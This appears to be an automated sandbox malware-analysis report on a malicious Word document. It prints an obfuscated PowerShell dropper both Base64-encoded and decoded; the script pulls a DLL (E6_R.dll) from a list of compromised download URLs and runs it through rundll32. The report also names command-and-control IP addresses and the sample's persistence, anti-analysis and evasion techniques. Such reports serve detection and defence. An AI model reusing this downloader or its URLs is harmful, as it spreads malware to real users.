WwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC Jump to behavior
PE file contains an invalid checksum
Source: E6_R.dll.5.dr Static PE information: real checksum: 0x5c618 should be: 0x609ad
PE file contains sections with non-standard names
Source: E6_R.dll.5.dr Static PE information: section name: .text4
Source: E6_R.dll.5.dr Static PE information: section name: .text8
Source: E6_R.dll.5.dr Static PE information: section name: .text7
Source: E6_R.dll.5.dr Static PE information: section name: .text6
Source: E6_R.dll.5.dr Static PE information: section name: .text5
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0016FED0 push edx; ret 7_2_0016FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00151155 push ecx; ret 7_2_00151156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001521EC pushad ; ret 7_2_00152200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00153391 push eax; iretd 7_2_001533AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00150C18 pushfd ; retf 7_2_00150C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001517A1 push ds; iretd 7_2_001517A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0018FED0 push edx; ret 8_2_0018FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00171155 push ecx; ret 8_2_00171156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001721EC pushad ; ret 8_2_00172200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00173391 push eax; iretd 8_2_001733AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00170C18 pushfd ; retf 8_2_00170C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001717A1 push ds; iretd 8_2_001717A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EFED0 push edx; ret 9_2_001EFFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D1155 push ecx; ret 9_2_001D1156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D21EC pushad ; ret 9_2_001D2200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D3391 push eax; iretd 9_2_001D33AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D0C18 pushfd ; retf 9_2_001D0C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D17A1 push ds; iretd 9_2_001D17A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001AFED0 push edx; ret 10_2_001AFFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00191155 push ecx; ret 10_2_00191156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001921EC pushad ; ret 10_2_00192200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00193391 push eax; iretd 10_2_001933AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00190C18 pushfd ; retf 10_2_00190C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001917A1 push ds; iretd 10_2_001917A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001DFED0 push edx; ret 11_2_001DFFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C1155 push ecx; ret 11_2_001C1156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C21EC pushad ; ret 11_2_001C2200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C3391 push eax; iretd 11_2_001C33AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C0C18 pushfd ; retf 11_2_001C0C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C17A1 push ds; iretd 11_2_001C17A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019FED0 push edx; ret 12_2_0019FFD4

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Bpqpm\gwvn.lsl:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Upjyf\ffrm.rmq:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2312 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2091542862.00000000003F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h] 7_2_1000A823
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 195.159.28.230 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 69.38.130.14 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ 